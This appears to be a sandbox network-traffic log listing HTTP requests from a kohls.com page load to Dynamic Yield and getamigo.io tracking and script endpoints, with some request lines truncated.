Source: global traffic	HTTP traffic detected: GET /api/8776374/api_dynamic.js HTTP/1.1Host: cdn.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /api/8776374/api_static.js HTTP/1.1Host: cdn.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /api/8776374/api_static.js HTTP/1.1Host: cdn.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js/d901bdeef8dea7e7cdf209f97d4f34679d1027e869fe30f1fbfc85bcfcd05790/load.js HTTP/1.1Host: tag.getamigo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /api/8776374/api_dynamic.js HTTP/1.1Host: cdn.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/amigo-loader.js?api_key=d901bdeef8dea7e7cdf209f97d4f34679d1027e869fe30f1fbfc85bcfcd05790 HTTP/1.1Host: tag.getamigo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js/d901bdeef8dea7e7cdf209f97d4f34679d1027e869fe30f1fbfc85bcfcd05790/load.js HTTP/1.1Host: tag.getamigo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sdk/amigo.min.js?d=N4IgziBcoAoE4HsC2BLMBTKAXOBXdANCAGbpYDGAFtnoSAFYCK+cAnjfkeQnBJDpxAAPACLIAhigB2AJXQBHfGCxRi4gDYYAvkXFRQ41AHME+kOIAOKANLp2kEABMAnAAYAjACNH6dMQAcPuIA7OjB5I7EAEyuzsTOwY4ALMQAzEkAbMHOju6uUaH+GXHoqa7E7sSexOT+AKye5DWOrnXZriBE6gjk4lgoCFJQIJRYWBZgkAD0UwDu8wB0ANYIlJoL3EhTnSDdvf2DAHKGmA7Wq+oA5GAABAA+NwDKlAgWNwDC3ViU0kYETy90GB-gAJZCEG7WFAUSjoKT-ABC6Ecjl+-wAKghWLcAGQ3ACyPEwRDgfnQcFJcGGo3GkxmcAsnjgC2hlE8ZAQQhQG2Q2y4CAQSxQQIAolJxJ51MjhgJiSALOIjOgADIIcSOACSjmGUUcxWCrl6AFoov5MkakuImkbPMEosQjc4klE6klyO5nGafDt+kh0AAvQanEBRJIdIjEX7kixwaQqBwBdyOciuRx1I0hZzOC2pVLoI3+cSucRGjyeTz+A2ZerBHYYMBgAZSLXDcSu4i5JKeE3BOr+C2uVoF9x1RxG1KBdzucTocTuN21ohYcmxrA8ewgACqjxAOhA5FwymQIj6emgIAAbsLZhYeFhHih-adQLMUI5vlB3KbXERYSgjKMUBuMEe7oEIFjksKUjkOgIgoDBMgIOomhmBYSAWAA+u4GEdJAGQ-vK6EYVEOFQKGRCOKw4qoOQGHileRh9E2n5JEQaGYdh7hQEk7hEBg4hwFQWGkZAdS8fKjiYXUInkYRmGpDJGR7suyhXugswAPIXiub7BgA2gAurubHkmAgwnlgZ7AHu9aNuZp5mN06rvIYCr-kMkBSLgyF7j4V4wRZVnKXA4hSGAVoHFIgX6Foe4WFAhlaEAA&_=1730300760455 HTTP/1.1Host: tag.getamigo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/amigo-loader.js?api_key=d901bdeef8dea7e7cdf209f97d4f34679d1027e869fe30f1fbfc85bcfcd05790 HTTP/1.1Host: tag.getamigo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /plugin/emitAmigoEvent/1ee297e8707c6cee9b38/ HTTP/1.1Host: tag.getamigo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /plugin/getResource/76a695a61b6737f22046/ HTTP/1.1Host: tag.getamigo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /plugin/invokeClientPlugin/69dbbb40587400f6db91/ HTTP/1.1Host: tag.getamigo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /plugin/invokeJsMethod/352075c926e93c3e1404/ HTTP/1.1Host: tag.getamigo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /plugin/scrapeData/35db357ab93f2ed08ea6/ HTTP/1.1Host: tag.getamigo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /plugin/setResource/2316faafcbc80fe4f50d/ HTTP/1.1Host: tag.getamigo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sdk/amigo.min.js?d=N4IgziBcoAoE4HsC2BLMBTKAXOBXdANCAGbpYDGAFtnoSAFYCK+cAnjfkeQnBJDpxAAPACLIAhigB2AJXQBHfGCxRi4gDYYAvkXFRQ41AHME+kOIAOKANLp2kEABMAnAAYAjACNH6dMQAcPuIA7OjB5I7EAEyuzsTOwY4ALMQAzEkAbMHOju6uUaH+GXHoqa7E7sSexOT+AKye5DWOrnXZriBE6gjk4lgoCFJQIJRYWBZgkAD0UwDu8wB0ANYIlJoL3EhTnSDdvf2DAHKGmA7Wq+oA5GAABAA+NwDKlAgWNwDC3ViU0kYETy90GB-gAJZCEG7WFAUSjoKT-ABC6Ecjl+-wAKghWLcAGQ3ACyPEwRDgfnQcFJcGGo3GkxmcAsnjgC2hlE8ZAQQhQG2Q2y4CAQSxQQIAolJxJ51MjhgJiSALOIjOgADIIcSOACSjmGUUcxWCrl6AFoov5MkakuImkbPMEosQjc4klE6klyO5nGafDt+kh0AAvQanEBRJIdIjEX7kixwaQqBwBdyOciuRx1I0hZzOC2pVLoI3+cSucRGjyeTz+A2ZerBHYYMBgAZSLXDcSu4i5JKeE3BOr+C2uVoF9x1RxG1KBdzucTocTuN21ohYcmxrA8ewgACqjxAOhA5FwymQIj6emgIAAbsLZhYeFhHih-adQLMUI5vlB3KbXERYSgjKMUBuMEe7oEIFjksKUjkOgIgoDBMgIOomhmBYSAWAA+u4GEdJAGQ-vK6EYVEOFQKGRCOKw4qoOQGHileRh9E2n5JEQaGYdh7hQEk7hEBg4hwFQWGkZAdS8fKjiYXUInkYRmGpDJGR7suyhXugswAPIXiub7BgA2gAurubHkmAgwnlgZ7AHu9aNuZp5mN06rvIYCr-kMkBSLgyF7j4V4wRZVnKXA4hSGAVoHFIgX6Foe4WFAhlaEAA&_=1730300760455 HTTP/1.1Host: tag.getamigo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /plugin/emitAmigoEvent/1ee297e8707c6cee9b38/ HTTP/1.1Host: tag.getamigo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /plugin/getResource/76a695a61b6737f22046/ HTTP/1.1Host: tag.getamigo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /plugin/invokeClientPlugin/69dbbb40587400f6db91/ HTTP/1.1Host: tag.getamigo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /plugin/invokeJsMethod/352075c926e93c3e1404/ HTTP/1.1Host: tag.getamigo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /plugin/scrapeData/35db357ab93f2ed08ea6/ HTTP/1.1Host: tag.getamigo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /plugin/setResource/2316faafcbc80fe4f50d/ HTTP/1.1Host: tag.getamigo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /st?sec=8776374&inHead=true&id=0&jsession=&ref=https%3A%2F%2Frpbr.ithbetoxi.com%2F&scriptVersion=2.43.0&dyid_server=Dynamic%20Yield&ctx=%7B%22type%22%3A%22HOMEPAGE%22%7D HTTP/1.1Host: st.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /scripts/2.43.0/dy-coll-nojq-min.js HTTP/1.1Host: cdn.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /dpx?cnst=1&_=409229&name=User%20Session&props=undefined&uid=5152118215960316765&sec=8776374&cl=dk.w.c.ms.fst.&ses=6422c8f0bb98e603976788b91eb4c9f9&l=def&p=1&sd=&rf=rpbr.ithbetoxi.com&trf=0&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139&url=https%3A%2F%2Fwww.kohls.com%2F&exps=%5B%5B%221067036%22%2C%229863190%22%2C%2225792075%22%2C0%2Cnull%2Cnull%2C%226223531284971217697%22%2C%222%22%2C%223%22%2C%226223531283276526106%22%5D%2C%5B%221096558%22%2C%2213270084%22%2C%2226047526%22%2C0%2Cnull%2Cnull%2C%226223531285028552266%22%2C%221%22%2Cnull%2C%226223531282218381299%22%5D%2C%5B%221127311%22%2C%2210280236%22%2C%2226221758%22%2C0%2Cnull%2Cnull%2C%226223531281688516575%22%2C%221%22%2Cnull%2C%226223531284435784473%22%5D%2C%5B%221127582%22%2C%2210281141%22%2C%2226223332%22%2C0%2Cnull%2Cnull%2C%226223531281501450898%22%2C%221%22%2Cnull%2C%226223531283525623267%22%5D%2C%5B%221179251%22%2C%2211202288%22%2C%2226647761%22%2C0%2Cnull%2Cnull%2C%226223531283486598196%22%2C%221%22%2Cnull%2C%226223531284450028582%22%5D%2C%5B%221185440%22%2C%2211002655%22%2C%2227022616%22%2C0%2Cnull%2Cnull%2C%226223531285337344252%22%2C%221%22%2Cnull%2C%226223531283899017054%22%5D%2C%5B%221289933%22%2C%2211374557%22%2C%2227236876%22%2C0%2Cnull%2Cnull%2C%226223531284342582131%22%2C%221%22%2Cnull%2C%226223531283855978855%22%5D%2C%5B%221309946%22%2C%2211951163%22%2C%2227308034%22%2C0%2Cnull%2Cnull%2C%226223531285093722672%22%2C%221%22%2Cnull%2C%226223531284983802992%22%5D%2C%5B%221343143%22%2C%2211836075%22%2C%2227429945%22%2C0%2Cnull%2Cnull%2C%226223531282356931978%22%2C%221%22%2Cnull%2C%226223531285009424051%22%5D%2C%5B%221364209%22%2C%2211678654%22%2C%2227506569%22%2C0%2Cnull%2Cnull%2C%226223531285013511387%22%2C%221%22%2Cnull%2C%226223531283753054186%22%5D%2C%5B%221430321%22%2C%2213039857%22%2C%2227737517%22%2C0%2Cnull%2Cnull%2C%226223531283553389137%22%2C%221%22%2Cnull%2C%226223531281455859128%22%5D%2C%5B%221494574%22%2C%2212255008%22%2C%2227939630%22%2C0%2Cnull%2Cnull%2C%226223531281929211350%22%2C%221%22%2Cnull%2C%226223531282553591841%22%5D%2C%5B%221499924%22%2C%2212255037%22%2C%2227954911%22%2C0%2Cnull%2Cnull%2C%226223531281611242527%22%2C%221%22%2Cnull%2C%226223531282400351928%22%5D%2C%5B%221654163%22%2C%2212837615%22%2C%2228481328%22%2C0%2Cnull%2Cnull%2C%226223531282440805148%22%2C%221%22%2Cnull%2C%226223531285467312969%22%5D%2C%5B%221717934%22%2C%2213127279%22%2C%2228707585%22%2C0%2Cnull%2Cnull%2C%226223531282585698845%22%2C%221%22%2Cnull%2C%226223531281764759573%22%5D%2C%5B%221718774%22%2C%2213127278%22%2C%2228710098%22%2C0%2Cnull%2Cnull%2C%226223531282278432871%22%2C%221%22%2Cnull%2C%226223531281411508625%22%5D%2C%5B%221800633%22%2C%2213331508%22%2C%2229002357%22%2C0%2Cnull%2Cnull%2C%226223531282345478973%22%2C%221%22%2Cnull%2C%226223531285464528637%22%5D%2C%5B%221850311%22%2C%2213485570%22%2C%2229152080%22%2C0%2Cnull%2Cnull%2C%226223531281209263875%22%2C%221%22%2Cnull%2C%226223531282350819874%22%5D%5D&expSes
Source: global traffic	HTTP traffic detected: GET /dpx?cnst=1&_=526553&name=User%20Type&props=%7B%22type%22%3A%22new%22%7D&uid=5152118215960316765&sec=8776374&cl=dk.w.c.ms.fst.&ses=6422c8f0bb98e603976788b91eb4c9f9&l=def&p=1&sd=&rf=rpbr.ithbetoxi.com&trf=0&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&url=https%3A%2F%2Fwww.kohls.com%2F&exps=%5B%5B%221067036%22%2C%229863190%22%2C%2225792075%22%2C0%2Cnull%2Cnull%2C%226223531284971217697%22%2C%222%22%2C%223%22%2C%226223531283276526106%22%5D%2C%5B%221096558%22%2C%2213270084%22%2C%2226047526%22%2C0%2Cnull%2Cnull%2C%226223531285028552266%22%2C%221%22%2Cnull%2C%226223531282218381299%22%5D%2C%5B%221127311%22%2C%2210280236%22%2C%2226221758%22%2C0%2Cnull%2Cnull%2C%226223531281688516575%22%2C%221%22%2Cnull%2C%226223531284435784473%22%5D%2C%5B%221127582%22%2C%2210281141%22%2C%2226223332%22%2C0%2Cnull%2Cnull%2C%226223531281501450898%22%2C%221%22%2Cnull%2C%226223531283525623267%22%5D%2C%5B%221179251%22%2C%2211202288%22%2C%2226647761%22%2C0%2Cnull%2Cnull%2C%226223531283486598196%22%2C%221%22%2Cnull%2C%226223531284450028582%22%5D%2C%5B%221185440%22%2C%2211002655%22%2C%2227022616%22%2C0%2Cnull%2Cnull%2C%226223531285337344252%22%2C%221%22%2Cnull%2C%226223531283899017054%22%5D%2C%5B%221289933%22%2C%2211374557%22%2C%2227236876%22%2C0%2Cnull%2Cnull%2C%226223531284342582131%22%2C%221%22%2Cnull%2C%226223531283855978855%22%5D%2C%5B%221309946%22%2C%2211951163%22%2C%2227308034%22%2C0%2Cnull%2Cnull%2C%226223531285093722672%22%2C%221%22%2Cnull%2C%226223531284983802992%22%5D%2C%5B%221343143%22%2C%2211836075%22%2C%2227429945%22%2C0%2Cnull%2Cnull%2C%226223531282356931978%22%2C%221%22%2Cnull%2C%226223531285009424051%22%5D%2C%5B%221364209%22%2C%2211678654%22%2C%2227506569%22%2C0%2Cnull%2Cnull%2C%226223531285013511387%22%2C%221%22%2Cnull%2C%226223531283753054186%22%5D%2C%5B%221430321%22%2C%2213039857%22%2C%2227737517%22%2C0%2Cnull%2Cnull%2C%226223531283553389137%22%2C%221%22%2Cnull%2C%226223531281455859128%22%5D%2C%5B%221494574%22%2C%2212255008%22%2C%2227939630%22%2C0%2Cnull%2Cnull%2C%226223531281929211350%22%2C%221%22%2Cnull%2C%226223531282553591841%22%5D%2C%5B%221499924%22%2C%2212255037%22%2C%2227954911%22%2C0%2Cnull%2Cnull%2C%226223531281611242527%22%2C%221%22%2Cnull%2C%226223531282400351928%22%5D%2C%5B%221654163%22%2C%2212837615%22%2C%2228481328%22%2C0%2Cnull%2Cnull%2C%226223531282440805148%22%2C%221%22%2Cnull%2C%226223531285467312969%22%5D%2C%5B%221717934%22%2C%2213127279%22%2C%2228707585%22%2C0%2Cnull%2Cnull%2C%226223531282585698845%22%2C%221%22%2Cnull%2C%226223531281764759573%22%5D%2C%5B%221718774%22%2C%2213127278%22%2C%2228710098%22%2C0%2Cnull%2Cnull%2C%226223531282278432871%22%2C%221%22%2Cnull%2C%226223531281411508625%22%5D%2C%5B%221800633%22%2C%2213331508%22%2C%2229002357%22%2C0%2Cnull%2Cnull%2C%226223531282345478973%22%2C%221%22%2Cnull%2C%226223531285464528637%22%5D%2C%5B%221850311%22%2C%2213485570%22%2C%2229152080%22%2C0%2Cnull%2Cnull%2C%226223531281209263875%22%2C%221%22%2Cnull%2C%2262235312823
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=41665&uid=5152118215960316765&sec=8776374&t=ri&e=1096558&p=1&ve=13270084&va=%5B26047526%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531285028552266&cgtgDecisionId=6223531282218381299&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765451&rri=4350736 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /userAffinities?limit=10&sec=8776374&uid=5152118215960316765 HTTP/1.1Host: rcom.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /var?cnst=1&_=451444&uid=5152118215960316765&sec=8776374&t=ri&e=1127311&p=1&ve=10280236&va=%5B26221758%5D&ses=6422c8f0bb98e603976788b91eb4c9f9&expSes=60326&aud=2028982.2099082.2355045.2356145.1408117.1476014.1667445.1438654.1899869.1362540.1362545.1951645.2013139.1468187&expVisitId=6223531281688516575&cgtgDecisionId=6223531284435784473&mech=1&smech=null&eri=1&tsrc=Referral&reqts=1730300765453&rri=5728072 HTTP/1.1Host: async-px.dynamicyield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://www.kohls.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.kohls.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /st?sec=8776374&inHead=true&id=0&jsession=&ref=https%3A%2F%2Frpbr.ithbetoxi.com%2F&scriptVersion=2.43.0&dyid_server=Dynamic%20Yield&ctx=%7B%22type%22%3A%22HOMEPAGE%22%7D HTTP/1.1Host: st.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
Source: global traffic	HTTP traffic detected: GET /scripts/2.43.0/dy-coll-nojq-min.js HTTP/1.1Host: cdn.dynamicyield.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DYID=5152118215960316765; DYSES=485f45289856e801061ea1736ab89d6f
